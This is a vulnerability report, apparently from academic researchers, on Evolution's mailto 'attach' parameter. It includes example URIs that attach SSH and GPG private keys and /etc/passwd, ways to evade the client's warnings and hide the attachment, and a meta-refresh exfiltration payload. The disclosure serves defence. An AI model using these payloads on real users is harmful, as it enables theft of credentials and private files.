Warn about and limit what can be attached using mailto: URI
In the scope of academic research we stumbled over a flaw (feature?) in Evolution (tested v.3.34.1-2+b1):
By using the proprietary (non-RFC6068) "mailto?attach=..." parameter, a website (or other sources of mailto links) can make Evolution to attach local files to the composed email. This is arguable a dangerous feature because it allows an attacker to exfiltrate arbitrary files on disk, if the victim sends an email based on attacker controlled mailto input and misses the attachment being added.
Obtain sensitive files (with a warning message):
mailto:email@example.com?attach=.gnupg/secring.gpg mailto:firstname.lastname@example.org?attach=.ssh/id_rsa mailto:email@example.com?attach=/etc/passwd
Obtain sensitive files (without a warning message):
Obtain zip archive with all files in user's home directory (no warning):
Evolution shows a warning for files in /etc and files beginning with a dot (hidden files). However this can be circumvented by simply attaching the whole (upper) directory.
Note that The existence of the attachment may be further obfuscated, by prepending multiple attach parameters with innocent file names or no file name at all (e.g., attach=/). Multiple attachments can be included at once by using multiple "attach" parameters in a single mailto URL.
Also note that future version of Evolution may add the feature to auto-save draft messages to the IMAP "drafts" folder after a couple of minutes. Thereby, Evolution would auto-save to the email (including all attachments) to the victim's IMAP "drafts" folder. This would problematic in the scenario of a malicious email provider which could trigger something like...
<meta http-equiv="refresh" content="60; URL=mailto:?attach=...">
...when the user is at lunchtime and thereby exfiltrate local files on disk to the attacker-controlled IMAP server.